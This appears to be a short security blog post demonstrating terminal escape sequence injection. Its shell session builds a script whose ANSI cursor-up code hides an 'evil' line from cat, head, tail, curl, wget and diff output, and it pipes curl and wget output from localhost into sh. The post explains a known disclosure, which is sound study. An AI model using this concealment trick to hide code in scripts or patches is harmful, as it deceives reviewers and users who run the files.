How it technically works

A terminal escape sequence is a special sequence of characters that is printed (like any other text).

If the terminal understands the sequence, it won’t display the character-sequence, but will perform some action.

$ printf '#!/bin/bash

echo doing something evil!

exit

\033[2Aecho doing something very nice!

' > backdoor.sh $ chmod +x backdoor.sh $ cat backdoor.sh #!/bin/bash echo doing something very nice ! $ ./backdoor.sh doing something evil!

As you can see, our beloved ‘cat’ cheated on us.

Instead of displaying the character-sequence, the escape sequence \033[XA (being X the number of times) performed some action.

And this action moves the cursor up X times, overwriting what is above it X lines.

But this doesn’t affect only cat , it affects everything that interprets escape sequences.

$ head backdoor.sh #!/bin/bash echo doing something very nice ! $ tail backdoor.sh #!/bin/bash echo doing something very nice ! $ more backdoor.sh #!/bin/bash echo doing something very nice ! $ curl 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice ! $ wget -qO - 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice !

But if we pipe it into a shell

$ curl -s 127.0.0.1/backdoor.sh|sh doing something evil! $ wget -qO - 127.0.0.1/backdoor.sh|sh doing something evil!

diff also interprets escape sequences and so do the resulting patches

$ cat backdoor.sh #evil file #!/bin/bash echo doing something very nice ! $ cat legit.sh #actually echoes doing something very nice! #!/bin/bash echo doing something very nice ! $ diff -Naur backdoor.sh legit.sh --- backdoor.sh 2015-09-17 16:25:42.985349535 +0100 +++ legit.sh 2015-09-17 16:26:14.950158635 +0100 @@ -1 ,4 +1,2 @@ #!/bin/bash -echo doing something very nice ! +echo doing something very nice !

Reference

http://www.openwall.com/lists/oss-security/2015/09/17/5 http://www.openwall.com/lists/oss-security/2015/08/11/8 http://turbochaos.blogspot.ca/2014/08/journalctl-terminal-escape-injection.html

Post Navigation